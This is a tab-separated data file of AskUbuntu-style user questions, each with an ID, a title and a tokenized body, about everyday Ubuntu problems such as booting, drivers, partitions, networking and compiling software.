398399	how to enable unity plugin without ccsm	i installed ubuntu 13.10 on an hp compaq d530 cmt and i can only see the desktop pic and i have found out that i do n't have the unity plugin enabled . i went here to see what this person did . i got ccsm and i have no way of applying changes to the unity plugin , so i can enable it , but that does no good because the changes do n't take effect . if i leave ccsm and come back the unity plugin is uncheckmarked . i really do not know what to do , some people have mentioned there are missing drivers for my pc also , but when i go to the update manager and go to drivers it says there are no drivers available for this computer . i do n't know what is stopping me from enabling the unity plugin , can anyone tell me a command i can use in terminal to fix my problems . thanks
398400	how do i navigate to folders with spaces in their names ? i get `` no such file or directory '' when i try	i 'm completely new and lost in ubuntu 12.04 , i 'm having trouble navigating to my sublime folder which i know is in my /opt folder . yet i 've tried to no avail to navigate into it via terminal window . the directory is colored in blue , no idea what this means ... but i am able to access the folder using the gui explorer ... ? k @ k-ubuntu : ~ $ cd /opt k @ k-ubuntu : /opt $ ls sublime text 2 k @ k-ubuntu : /opt $ cd sublime text 2 bash : cd : sublime : no such file or directory k @ k-ubuntu : /opt $ cd /sublime text 2 bash : cd : /sublime : no such file or directory
398404	ubuntu not loading after grub	so i installed ubuntu 13.10 as the primary os on my laptop . i installed windows 8 in another partition and set up grub to be the boot loader . eventually i updated windows and it became a black screen so i reinstalled windows in that partition . somehow doing this removed windows from grub 's menu and so i tried to reinstall grub which i had a little trouble doing . i tried it a few different ways , one of them was booting from a livecd and involved mounting and unmounting things ( did this pretty much blindly as i do n't have a lot of the know how ) . that did n't work but i came across the standard boot-repair program and it worked fine . the big problem i have no is that ubuntu does not load after selecting it from grub . it just hangs at a black screen . when i select recovery mode , it goes to the menu . when i resume the normal boot , it reads out : '' ubuntu 13.10 denjay-laptop tty1 denjay-laptop login : _ '' with a flashing underscore . after a few seconds it then adds to that line `` initct1 : event failed '' i also checked all the file systems with the recovery mode and with a livecd and nothing was anomalous on that end . i 've also gone through updating grub so i think something wrong post-grub if that makes sense . any help would be greatly appreciated .
398405	automatically add external display to screen in ubuntu server	i 'd like to be able to control my laptop 's ( ubuntu server 12.04 ) external display over ssh . i know about the screen command , but it requires that i add the display from the laptop . is there a way to automatically run screen -s extmonitor on startup , 'mounting ' the screen ?
398406	encrypted 13.10 will not reliably boot	edit : solved ! see http : //askubuntu.com/a/403876/212688 i re-installed ubuntu 13.10 x64 on my vaio pro , in legacy , bios mode . the installation is lvm/luks encrypted and thus asks me for the encryption password before booting . it does not reliably boot . i often have to try several times , those are the errors i get : ... alert ! /dev/mapper/ubuntu-vg-root does not exist ... and sometimes it `` boots '' without asking me for the password and then fails with cryptsetup : cvms_activate is not available this happened on my old install , i fully wiped the ssd and the problem still persists . how can i fix this ? and does anyone have an idea , why booting takes over one minute ? the pci-e samsung ssd reads with around 800mb/s that should boot in 15 seconds or less . my macbook with a slow sata3 ssd boots in 20 seconds , with full disc encryption . edit : crypttab : http : //paste.ubuntu.com/6673077/ fstab : http : //paste.ubuntu.com/6673078/ i did n't mention it before , but i used the defaults of the installer and did n't create my own partition layout . just install with internet and getting updates during the install , reboot into system , install updates and then i had the error , again , like in my previous install .
398408	how to enter arabic superscript and subcript alef in keyboard ?	how to insert arabic character for superscript alef ( like in هٰ ) and subscript alef ( like in هٖ ) from keyboard directly ? are they commonly used in arabic or only used in mushaf uthmani of the holy quran ? actually the subscript alef is not rendered below ه in my computer ( ubuntu raring ) , but on the left side of the letter instead . however the superscipt alef is rendered above the letter . i doubt i copied a wrong character : ) .
398410	ca n't install from usb . shows options but does n't execute when i select to install	i just built a computer and i did the universal usb installer and made my usb stick fat32 formatted and i changed the bios and made it boot first . i downloaded and tried both versions 12.04 lts and 13.10 and both will show a black screen with a ram stick rectangle figure and a equal sign and a man on the other side of the equal sign on the bottom . if i do n't hit enter it will go to a blank screen and will stay there . when i tried pressing enter it gave me a black screen and it said ubuntu on top and gave me options listed in a columns and will say install ubuntu , try ubuntu with out installing , check for disc damage , etc it does n't look like the correct screen compared to the screen shots on ubuntu.com . i am not sure what else to do at this point if i hit any of the commands not one works all go to a blank screen . please help
398412	pptp vpn idle timeout	i have lubuntu 13.04 ( which already comes with xfce ) . i can connect to internet only by pptp vpn . i made ââa vpn configuration according to the instructions from the provider 's website ( http : //slv.ufanet.ru/tex-podderzhka/internet/spravochnyj-material-nastrojki/n ... ) , but when i leave pc for a while ( even with working torrents , steam and other software that consume traffic ) , then vpn just disconnect and wo n't reconnect automatically . i have to manually enter keyring and secure passwords again to be able restore connection manually . probably i need some special settings to keep vpn connection alive ?
398425	ubuntu can not recognize samsung 46 inch tv but can detect 24inch tv/monitor model	i have htpc running ubuntu server 12.04 . i have been using samsung t240hd tv/monitor model which supports 1080p without any problems . however , after i connected to new samsung 46 inches fh6030 , i get no signal display after boot . i get bios screen and grub selecting screen . also , if i boot to recovery mode and select resume , i can boot to graphic environment . however , i get low 1280x1024 resolution with display named `` laptop '' . is there a way to make my tv to recognize my htpc in normal boot ? and , can i change screen resolution to 1920x1080 ?
398427	xbmcbuntu no gui after killing xbmc using kill -9	i have been using xbmcbuntu for quite some time now ( xbmc 12.2 and ubuntu 12.10 packed as xbmcbuntu ) . for coming to the login screen from xbmc , i tried shutdown- > quit . but it did not work . all i got was blank screen . so i switched to terminal using [ ctrl ] + [ alt ] + [ f1 ] and did ps aux | grep xbmc . then i killed all the filtered processes using kill -9 command . still the login screen did not come . but after this when i boot the machine , no gui comes up . i 'm not even able to access the terminals via [ ctrl ] + [ alt ] + [ f1 ] . currently i 'm accessing the machine via ssh . i understand killing a process just kills it and the process has no reason not come up again on reboot . but when i do ps aux | grep xbmc now after rebooting , there are no xbmc processes running . any idea why the gui is not coming up . from reading around , what i 've come to know is the default session for lightdm is specified in /etc/lightdm/lightdm.conf file . mine uses xbmc as the default session and the session is defined in /usr/share/xsessions/xbmc.desktop . when i try starting xbmc-standalone on commandline via ssh , i get this output . any idea on which direction to proceed to fix this ? here are some log files that i thought might be useful although i did n't see anything weird going on there : /var/log/boot.log /var/log/lightdm/lightdm.log /var/log/lightdm/x-0.log /var/log/xorg.0.log
398428	gui dbms for databases generated by updatedb cmd shell	i have an external hdd . i have used updatedb cmd to persist path of all files in hdd . updatedb -l 0 -o ~/.abdennourhdd.db -u /media/abdennourhdd/ i want to query this database . so i run this cmd : locate -d ~/.abdennourhdd.db pdf the problem is that the cmd above is not powerful for querying . i want to have a search engine on this db more powerful . hence , i have two questions : what 's the dbms ( managmentsystem ) of databases generated by updatedb . there is a gui ( graphic interface ) to administrate this type of database ? update : i try h2 console via gui web . connection have been done successfully . however i do n't find the tables of database
398429	resizing ubuntu partition in a dual boot system	i have to resize my ubuntu partition since its running out of space and i am getting warning messages while booting . i searched on internet and got to know that it can be gparted using live cd . i tried that but as the following screenshot shows : there is no adjacent empty space for /dev/sda9 which have ubuntu installed in it and i dont have any idea that what /dev/sda8 exactly is . so since it is not possible to resize directly can i first delete /dev/sda8 and then merge it with /dev/sda9 and then this can be merged with unallocated space left to /dev/sda8 and then finally can take some space with /dev/sda6 to make a bigger ubuntu partition . or is there any other way to do it ? please guide me as i dont want to reinstall ubuntu again with larger space .
398431	ltsp thin client would not login	the situation is : i have created an ubuntu ltsp 64bit server with 32 bit clients using the steps in this tutorial . i used virtual box machine as thin client using same procedure in this tutorial . every thing goes well and i could boot normally the thin client till it gets into the ldm login window . i enter my username and password but nothing happens still showing verifying password . please wait then the ldm restart . ( not the system ) . i tried to make autologin by adding the username and password to the lts.conf file but still not working.. i restarted ssh server and dhcp and build the ltsp image again but still hanging in the same problem ... any help is appreciated .
398434	confusing when installing on windows 7	i have an acer aspire v3-571g with windows 7 , intel core i5 . it has the usual bootable partition . i want to install a version of ubuntu . i had a trial run some days ago and when the install asked me to choose where to install i could not figure out which was the c : / drive or the partition . i want to keep the windows 7 recovery partition just in case i want to sell this laptop and get me a better one later on and install ubuntu over windows 7 ... ie there is a partition that acer created to house the recovery software . then there is the c : \ drive that the os is installed on so i want to blitz the c : \ drive and install ubuntu but keep the recovery partition . how easy is this to do ? hope this makes sense regards david
398435	installation problem ( 12.04 ) . only boots using failsafe mode	i have a dell inspiron pc , on which windows 7 works perfectly . i chose ubuntu 12.04 for a dual boot . i was unable to install 12.04 using the normal 32 bit cd iso file . after booting , i got a string of code , with the pc hanging on : [ xxxxx ] [ ] sysenter_do_call+0x12/0x28 i tried the 64 bit iso , but that failed in a similar manner , but with the last line showing : '' system_call_fastpath+0x16/0x1b '' . i was successful with the alternate 32 bit iso file . however , i am unable to boot normally . at the grub window , if i select the default ubuntu 12.04 option , the pc freezes with a purple screen . i have to select the failsafe option . then after selecting `` resume normal boot '' , the screen shows the message : udevd [ 1061 ] missing file parameter for attr then i get the normal login screen and ubuntu works fine .
398436	accidentally hid a notification in xfce4-notifyd	i use xubuntu 13.10 . yesterday i accidentally hid a notification that shows if my vpn connection was successful . i clicked on the button `` never show this notification again '' or so ... .it is a guess that xfce4-notifyd shows these notifications . is there a way to undo this action ? perhaps a config file or something ?
398439	how to install an app written in python ?	i tried to install an app written in python using this command in terminal : sudo make install at the very last stage of installation , this message pops up : [ -x /usr/bin/update-desktop-database ] & & sudo update-desktop-database -q i just want to know what it means and how to finish installation process .
398442	problem configuring dhcp server : job failed to start	i m trying to configure dhcp server in ubtuntu onto my virtual box and connecting other virtual instance of ubuntu to this dhcp sever i have installed dhcp server using sudo apt-get isc-dhcp-server then i went to /etc/networks/interfaces and wrote this auto eth0 iface eth0 inet static address 192.168.1.1 netmask 255.255.255.0 gateway 192.168.1.254 broadcast 192.168.1.255 dns-nameserver 192.168.1.254 dns-search lan i then restarted networking service using sudo service networking restart suddenly my gui crashed and hanged and all that stuff , which forced me to reboot the system . i checked for ip which showed me that i had got it . then i went to /etc/default/isc-dhcp-server and made this change interfaces= '' eth0 '' then i went to /etc/dhcp/dhcpd.conf and wrote the following lines ddns-update-style none ; default-lease-time 600 ; max-lease-time 7200 ; authoritative ; log-facility local7 ; option broadcast-address 192.168.1.255 ; option routers 192.168.1.254 ; option domain-name-servers-192.168.2.1 ; option domain-name `` ttc.com '' ; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.20 192.168.1.30 ; } i restarted the service using sudo services isc-dhcp-server but it says : stop : unknown instance : start : job failed to start i also tried to start dhcp server using the command sudo service isc-dhcp-server start but when i tried sudo start isc-dhcp-server or sudo status isc-dhcp-server it shows me an error of iscinitctl : unable to connect to system bus : failed to connect to socket /var/run/dbus/system_bus_socket . no such file or directory . i do n't know what to do now so please give me some guidence solving this error . i would like to provide more details i needed .
398444	error after removing screenlets	i used to have screenlets installed on my laptop , but i found it useless and removed it . after removing , whenever i login , this message shows up and it really drives me crazy . kdelnit could not launch '/usr/share/screenlets-manager/screenlets-daemon.py'| any idea how can i get rid of it ? by the way , its kde 4.12
398447	how do you mount the windows partition of a hybrid windows/mac dvd	how to you mount the windows partition of a hybrid windows/mac dvd
398448	gksu is not availabe in ubuntu 13.10	i have recently downloaded ubuntu 13.10 from its site and updated it . i was going to install peperflash in chromium browser but it asks for gksu . i have run sudo apt-get install gksu but it says the package is unavailable . how can i install gksu ?
398449	firefox can not display some icons of some english sites	my firefox now is updated to 26.0 . i find my firefox can not display some icons of some english sites . below is my screenshot of wordpress management interface . on the left of the picture , you can find those strange characters . what is the matter ? thanks
398451	middle mouse button emulation on lenovo t431s	i 'm running ubuntu ( 13.10 ) on a lenovo t431s . since lenovo has removed the classic 3 mouse buttons on top of the touchepad , there is no middle mouse button any more . and emulating the middle mouse button did n't work , because it only recognises either the left or the right click , but not simultaneously . is there any way i can emulate an middle mouse button ?
398457	the error : `` mount : only root can do that '' while mounting a partition	i 've installed ubuntu 12.04 along with windows 8.1 . when i tried to open the c : drive in ubuntu a window is popping out saying to run this command : mount -t ntfs-3g -o remove_hiberfile /dev/sda2 /media/2a36ee3236edfea7 after running the command i 'm getting the error mount : only root can do that . what should i do ?
398459	no sound , ubuntu server12.04	i have installed ubuntu server 12.04 on my computer . today when i was trying to listening music , i found there was no sound . the player i used is mplayer . may be i did n't install sound driver but i do n't how to do that in the command line environment . i have installed alsamixer and turned all volumes to the top , but theres is still no sound . alsa-info.sh results
398471	transferring emails from one thunderbird ubuntu installation to another	i just acquired another laptop for use and so we have two with ubuntu 13.10 installed . i wanted to ask if anyone knows how we can transfer all the old emails in thunderbird ( inbox , sent drafts etc ) from one pc to another ? thank you .
398473	errors while compiling cudasw program	i wanted to compile barracuda program . what i did was : untar this program using : tar -xvzf barracuda_source_r280.tar.gz then i typed make output is down here asmaa @ ubuntu : ~/downloads/cudasw/cudasw++v3.0.14 $ make mkdir -p objs nvcc -o3 -arch sm_30 -- ptxas-options=-v -use_fast_math -xcompiler -funroll-loops -xcompiler -msse2 -dmax_seq_length_threshold=3072 -i . -i ~/nvidia_gpu_computing_sdk//c/common/inc -c cfastafile.cpp -o objs/cfastafile.cpp.o /bin/sh : 1 : nvcc : not found make : *** [ objs/cfastafile.cpp.o ] error 127
398474	hello my question is about matlab and its installation and when i want to stop the installation progress i found a problem which is :	beside the progress bar i did n't get ( x ) for canceling so , is there any solution please ! because i need matlab for my work thanks ...
398477	intel nuc d54250wyk - usb disk and wifi network	when i plug my usb disk ( lacie , powered by usb port only ) to the nuc , the wifi network speed goes minimal ( 20 mb/s to 1 mb/s ) . i use ubuntu 12.04 and the wifi card is intel centrino n6235 . i have found nowhere a solution to this problem , any help would be greatly appreciated . thanks ,
398479	hp pavilion g6 overheating due to the graphics driver	i have an hp pavilion g6 where i recently installed ubuntu instead of windows 7 on it i googled a bit and found out that the problem to my overheating was the graphics accelerator which was `` fglrx graphics driver ( experimental beta '' , i tried removing it but failed to do because i have no ati folder in /user/share/ i 'm only trying to remove it and install a more stable one but failing to do so too are there any solution to this ? my cpu is at 106 degrees celcius
398481	make python2.5 failed on ubuntu 13.04	for some reason i need to install python2.5 on ubuntu 13.04 . i tried to install it from source . however the make operation is failed with the following error : gcc -pthread -c -fno-strict-aliasing -dndebug -g -fwrapv -o3 -wall -wstrict-prototypes -i . -iinclude -i./include -dpy_build_core -dsvnversion=\ '' `lc_all=c svnversion .`\ '' -o modules/getbuildinfo.o ./modules/getbuildinfo.c gcc : error： directory '' ：no such file or directory make : *** [ modules/getbuildinfo.o ] error 1 i googled about it but still do n't know what happened . how could i fix this ? thanks .
398482	software updater shows an invisible non-installable update	i have a problem with software updater , which shows an `` invisible '' update . installing does nothing . the system is up to date : petr @ sova : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded petr @ sova : ~ $ sudo apt-get dist-upgrade -f reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . strange thing ( which is the problem ) is that i ca n't upgrade from 13.04 xubuntu to 13.10 as the updater does n't offer such an option . i 've recently restored the system using clonezilla 's image . however , everything else is working correctly . could 've clonezilla caused the problem ? i do have some ppas enabled , but disabling them , updating and trying software updater again changed nothing .
398485	ubuntu login failed due to apache2	i ca n't login into my ubuntu system , the error is : towry-pc login : apache2 : could not reliably determine the serverâs fully qualified domain name , using 127.0.1.1 for servername check battery state ... how to fix this problem ? ?
398489	how to install build-essential ?	i am trying to install g++ compiler in ubuntu 13.10 . it told me i needed to install the build-essential package . i have tried the below code sudo apt-get update sudo apt-get install build-essential it gives me this error : reading package lists ... done building dependency tree reading state information ... done e : could n't find package build-essential
398490	please need help with my mess	i really wanted to try out something different then windows 7 . so i installed ubuntu and i have no clue on how to work it . iâm totally lost and have been trying to go back to windows by using the windows disc i made my recovery of , and its not working like im trying . i have a toshiba satellite l655-s5096 windows 7 64 bit . i have been trying to run different disc also like the rescue cd , dban 2.2.8 , dariks boot and nuke , to name a few..i guess im so use to windows commands and cant get a grip on how to delete this so i can do a clean install of my windows 7 . could anyone please help walk me through deleting ubuntu and installing windows back on here .
398494	how do i install ubuntu on laptop with broken screen	i have an old laptop with a broken screen so i ca n't see any text on the right 3/4 of the screen ... just a small strip on the left from top to bottom is visible . i have the laptop connected to my lcd tv but nothing appears on it until the laptop boot gets to the windows logon screen . i want to replace windows vista with ubuntu but ca n't see the screen on the laptop to change boot sequence to install by usb or cd . i 've investigated the option to install using the windows installer but it looks like this option will create a duel os and i do n't want that . i 'm a complete noob to ubuntu . my goal is to set up a media center using laptop/ps3/xbmc/tv .
398496	want to delete ubuntu	i downloaded and installed ubuntu , using the cd that i had to make to boot up the computer . i 'm sure i told it to run alongside windows 7 , , but i do n't think that happened . now i ca n't find windows 7 , and i 'm trying to press f11 to put computer back to factory settings . i get a error message that reads error : unknown filesystem . grub rescue . please , all i want to do is completely delete & uninstall ubuntu and re-store windows 7 and if necessary , put back computer to factory settings . i should not have to take the computer to a repair shop and pay a fortune to have them do this for me .
398498	`` the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . '' while mounting a ntfs partition	i divided my 320 gb hdd into parts , the parts are shown but are not opening in hte file systems . what should i do ? the following message is shown : error mounting /dev/sda3 at /media/devanshu/fae07218e071daf9 : command-line `mount -t '' ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' '' /dev/sda3 '' `` /media/devanshu/fae07218e071daf9 '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
398501	`` no key available with this passphrase ''	error unlocking /dev/sdc1 : command-line `cryptsetup luksopen `` /dev/sdc1 '' `` luks-a4726230-7903-4378-b7bc-c87472426a5f '' ' exited with non-zero exit status 2 : no key available with this passphrase . this is what shows when i try to open my hard-drive . so , how can i overcome this problem ?
398504	downloaded ubuntu 12.04 to file copied to dvd disc , wo n't open on win xp pro , asks for program to open it ?	tried ie to open 12.04 but it will not . what to do ? how do i open it ?
398507	how to use ubuntu to kill processes in windows machine on my local network ? !	having two computers ( 1 desktop ubuntu , 1 laptop windows 7 ) . is it possible to kill a process of a given running service on windows 7 such as skype , knowing that i have its local ip address along with its mac address for the windows 7 ?
398509	is it possible to programmatically log in a specific user on a specific virtual console ?	i 'd like to implement one of the answers on how to make sure , that certain functionality ( like alt+ctrl+f1 switching into tty ) is available in havily swapping system ? , and for that i 'll need a way to login a user on a virtual console . is it possible in a non-interactive manner at all ?
398511	mounting points and file permissions	i have a system with dual boot - ubuntu 12.04 ans opensuse 12.3 i logged into ubuntu and i am able to mount opensuse partition without any issues by entering fstab uuid command with default options . the question has to do with file permissions . will the file permissions get carried over to ubuntu system ? because i find the first level of directories are mounted as root/root . if i go into /home/harish folder in opensuse partition , it actually owned by ubuntu user with same uid . it is not mounting entire partition as root/root . instead it is mapping uids and gids of opensuse user and ubuntu user and set the permissions accordingly . is this behavior correct ? i want to mount a ext4 partition into ubuntu as root/root , but need to have file permissions as rwx-rwx-rwx for all the files and folders . is this doable ? thanks , harish pathangay
398512	rc.local does not execute all of the commands	# ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . echo `` rc.local executed successfully '' > /tmp/rclocal_executed /usr/bin/synclient tapbutton2=0 /usr/bin/synclient rightbuttonarealeft=3 /usr/bin/tilda & exit 0 command echo `` rc.local executed successfully '' > /tmp/rclocal_executed executed successfully , but the rest is not . i assume the problem could be that these commands should be executed after i log in , and rc.local probably executed when just os starts , therefore it might have no effect . how to execute specified commands on a start up ?
398514	machine check error from dvd	i have a asrock z87 extreme6 board , when i try to boot ubuntu saucy with non uefi boot i get a machine check error . if i try with uefi , i get a blank screen . any ideas ? machine configuration : kingston hyperx blu memory 16gb seagate 1tb sata600 asrock z87 extreme6 intel core i5 4570 , 3.2ghz asus bw 16d1ht using onboard gpu
398517	can not find 'nodmraid ' when installing ubuntu 13.10 under uefi with windows 8.1	i am new to linux , and i want to install ubuntu 13.10 on my windows 8.1 tablet , acer w700 . i meet the problem ubi-partman failed with exit code 10 . people say to solve the problem by press f6 and select nodmraid when booted from usb disk . but i can not find f6 , neither nodmraid . the boot manu shows : try ubuntu without installing install ubuntu oem install ( for manufacturers ) check disc for defects with the bottom : use the + and - keys to select which entry is highlighted . press enter to boot the selected os , 'e ' to edit the mommands before booting or 'c ' for a command-line . esc to return previous menu . '' how can i 'nodmraid ' ?
398524	stream files from ftp to dlna	we have a ftp server here in the dorm , and i would like to reach the files on it over dlna with my tv . i am looking for a software that can do this .
398527	how can i disable the terminal emulator for certain users ?	how to prevent specific users from using the terminal emulator ? ! i make a trick by writing a script in .bashrc which request a user to enter a password to be able to use the terminal emulator . but this trick is not the perfect method for some advanced users who knows how to work over this trick . for that , i 'm seeking a method to prevent specific users from using terminal emulator at all . any suggestions ? !
398528	system freeze after usb 3.0 external drive mounting	i have ubuntu 13.10 x64 with cinnamon desktop and kernel 3.12.6 . when i plug in my external drive verbatim , nemo opens and mounts the drive , after that the system freezes . so i need to unplug the drive and cinnamon restarts after a `` kill by signal 15 '' i saw in my log file . in the past i had ubuntu x64 with kde and same kernel 3.12.6 on the same machine and i had no problems with my external drive . i also tried with default ubuntu 13.10 kernel 3.11 , but same problem . here is my syslog : http : //pastebin.com/raw.php ? i=hxgfjben is there a way to solve it ? thanks edit : i have just discovered that my drive that causes the freeze works on my laptop with same software : mint 16 , cinnamon and kernel 3.12.6 . so maybe my issue is related to mint or cinnamon and my hardware configuration ? i have : motherboard asus p8p67 pro cpu intelâž coreâ˘ i5-2500 processor my os is running on a crucial ssd m4 also a strange thing is that i have tried to mount another usb 3.0 external drive and it works well . i have just read again the syslog and maybe the problem is about the .trash-1000 folder content , it seems that the errors occur when trying to read some data from that folder . what do you thing ?
398529	upgrade to kernel3.10.18 changing backgroud image disable	when i upgrade the kernel of ubuntu12.04.3 to 3.10.18 , i ca n't change the backgroud image and some file icons on the desktop changed , also usb ca n't be automounted . how to solve the problem ? i have tried the dconf-editor did n't work .
398533	new dell 3437 preinstalled ubuntu laptop not working	i got a new dell 3437 laptop , when oned the laptop ubuntu started to install intself . but at the end some packages did n't installed properly like `` update manager '' . after that i am not able to update or upgrade and the laptop came with 12.04 version . meanwhile the wireless driver got updated , now i am not able to use wifi also . i tried to reboot the system and install again , but it is not working or i do n't know how to do it . i checked with dell support they are not understanding , the support guy told to install windows , then they will help , i told i dont't want windows and purposefully taken ubuntu the guy did n't understand at all . now i planned to download a ubuntu 12.04.03 lts and then install again in the laptop . what is the suggestion . this is a brand new laptop bought yesterday only .
398535	create a launcher to launch multiple applications at once ?	when i develop , i have to start xampp and open up sublime text . so , would n't it be better to have them both open from the same launcher on my desktop ? right now i have 2 launchers , one for starting xampp ( gksu /opt/lampp/xampp start ) , and one for sublime text ( gksu /etc/sublime-text/sublime_text ) . is there a way to combine the 2 into one launcher that starts them both ?
398540	backlight brightness changing hangs system	my laptop dell inspiron n5010 , installed ubuntu 13.04 , while changing screen brightness my lap hangs and have to long press power button to shutdown , in ubuntu version 11.04 this problem not come . is any solution available ?
398542	how do i install ubuntu on a mac 11,1	i ca n't seem to find a ubuntu version that is good for the mac hardware 11,1 , could someone please help me out . thanks already
398544	ubuntu 13.10 wo n't recognize [ or connect ] to my galaxy s3 [ android ]	when i connect my galaxy s3 to my laptop which is running ubuntu 13.10 , it will not detect the android device . what can i do to fix this ?
398550	setting up sublime text editor for latex	for a few day i have been wondering how to set up sublime text editor for latex editing . i have installed texlive-full and latexmk as it has been suggested . also i have installed sublime text editor . i just do n't know how to get latex into sublime 's build menu . should i somehow make sublime text editor to understand that i 'm writing .tex documents and i want them to be compiled to .pdf ? there are a few web pages about this thing but i just do n't get it . can someone in a really concrete way to explain how to build .tex documents with sublime text editor . i have understood that i have to do something with latextools but i do n't even know what that is . is it something inside the sublime text or something else ? the editor opens nicely all my .tex files . and latex is working with other editors . but i would like to use sublime text cause i write long documents and i like to floating image of whole text . thank you ! .silouan
398551	problem with keyboard-indicator icon	i must logout and login to fix keyboard indicator icon . when system startup keyboard-indicator icon looks like this : http : //s28.postimg.org/5zf5ud6q5/screenshot1.png but after logout and login it looks like this that shoud be : http : //s14.postimg.org/cl3ffqdo1/screenshot2.png what can i do ?
398552	skype on 13.10 32 bit , mic not working	i am trying to get skype working , i 'm currently running kubuntu 13.10 . i ca n't get the mic to work during the test call . i start up the test call . listen to the nice lady . wait for the beep . talk into my webcam my while also observing the audio levels go up and down in pavucontrol . after the second beep , i hear nothing , even if i turn my volume up . fwiw : google video chat and hangouts work fine for me . the test sound does n't work that great ; it plays very softly . i have unchecked `` allow skype to adjust audio levels '' . i am running skype from the canonical repos , and through the kubuntu menu ( so i think it uses the desktop file with the pulseaudio latency = 60 fix ) . and that 's it . i do n't know what else to do .
398555	change the system folder name back to english	there are some system folders in ubuntu including documents , download , etc . the operating system language on my computer is chinese and those folder names are also displayed in chinese , like the name of folder `` document '' is ććął , which is document in chinese . may i ask how to change them back to english ? many thanks .
398558	realtek rtl8723e not working at kernel 3.5	i have a problem with my realtek wifi card . last time when using kernel 3.2 , all i have to do is punch in these codes while connecting to internet , everything will be solved . these codes are : sudo apt-get install build-essential linux-headers-generic linux-headers-`uname -r` wget -o- http : //dl.dropbox.com/u/57056576/drivers/realtek`/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012.tar.gz | tar -xz cd rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 make make install sudo modprobe rtl8723e now , with kernel 3.5 , it gives an error at the 'make ' command make make -c /lib/modules/3.5.0-44-generic/build m=/home/*censored*/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-44-generic' cc [ m ] /home/*censored*/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o /home/*censored*/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘_rtl_init_mac80211’ : /home/*censored*/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : error : ‘ieee80211_hw_beacon_filter’ undeclared ( first use in this function ) /home/*censored*/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : note : each undeclared identifier is reported only once for each function it appears in make [ 2 ] : *** [ /home/*censored*/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o ] error 1 make [ 1 ] : *** [ _module_/home/*censored*/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-44-generic' make : *** [ all ] error 2 i knew there 's an update , but i 'm not sure how to implement it , or how to get it . i tried to search for solution but to no avail . i tried make clean , and that does n't solve my problem . any help will be appreciated . thanks .
398559	ubuntu touch - wifi - sound - stuff	i recently installed ubuntu touch on my lg nexus 4 and have followed all the steps . at first , it seemed to be working perfectly well . ubuntu booted , and was just as i expected it to be . then i realized wifi did n't work . next i noticed sound does n't work either ( from music app , phone app , etc . ) i ca n't install external apps either , and all i can do between my linux machine ( computer ) and my phone is access the phone 's terminal through adb shell . i have no idea where to start , from installing wifi , getting the sound to work , and getting the screen brightness to stay the way it is set whenever i switch off the phone and turn it back on . regarding the wifi problem , i have read a few posts telling me to flash a radio.img from android 4.3 . i have no idea what that means , and if that is a necessary step i need guidance with it . thank-you , any help is appreciated .
398560	always hide an application 's window	i 'm using the selenium webdriver to run automated tests in firefox on my web applications , and while it 's all working perfectly , it 's a little bit annoying how firefox pops up over everything while it 's running . is there a way i can always always always by default hide firefox ? or minimize it every single time it opens or something ? what i 'd really like is for it to always open in a default workspace . i 'm using ubuntu tweak so i have 16 x 16 workspaces . can i get firefox to always open in a certain one ?
398561	how to access a guest os running in virtual box from a different user account	i installed virtualbox in ubuntu 12.04 , in which i installed windows xp . however i am unable to see virtualbox on desktop when logging in a different user account and consequently unable to access windows xp . how do i access windows xp running in virtualbox from another user account on the same pc ?
398563	chromeipass and keepass	i am lost . i want to use keepass2 on my ubuntu 12.04 . i got keepass 2.24 finally loaded . using 2 dll instead of the .plgx for the plugin . when i tried the plgx file , it could n't find the plugin . but that was before i loaded keepass 2.24 . now i have the chromeipass extension loaded in chrome . but when i click it , nothing happens . keepass2 recognizes the keepasshttp plug in but there are no options with it . are you confused yet ? i am . i have been searching the internet . i try first one set of dlls and then the next . i am getting one error message i took a pictures of it . it looks like the newtonsoft.json is not working ? i would love any help anyone can give me !
398564	host server minecraft or samp	is it possible to run a minecraft- or sa-mp-server ( gta san andreas multiplayer ) on ubuntu . if yes , how can i do this .
398565	errors while compiling cudasw++v3.0.14 program	i wanted to compile cudasw++v3.0.14 program . what i did was : untar this program using : tar -xvzf cudasw++v3.0.14.tar.gz then i typed make output is down here asmaa @ ubuntu : ~/downloads/cudasw/cudasw++v3.0.14 $ make mkdir -p objs nvcc -o3 -arch sm_30 -- ptxas-options=-v -use_fast_math -xcompiler -funroll-loops -xcompiler -msse2 -dmax_seq_length_threshold=3072 -i . -i ~/nvidia_gpu_computing_sdk//c/common/inc -c cfastafile.cpp -o objs/cfastafile.cpp.o /bin/sh : 1 : nvcc : not found make : *** [ objs/cfastafile.cpp.o ] error 127
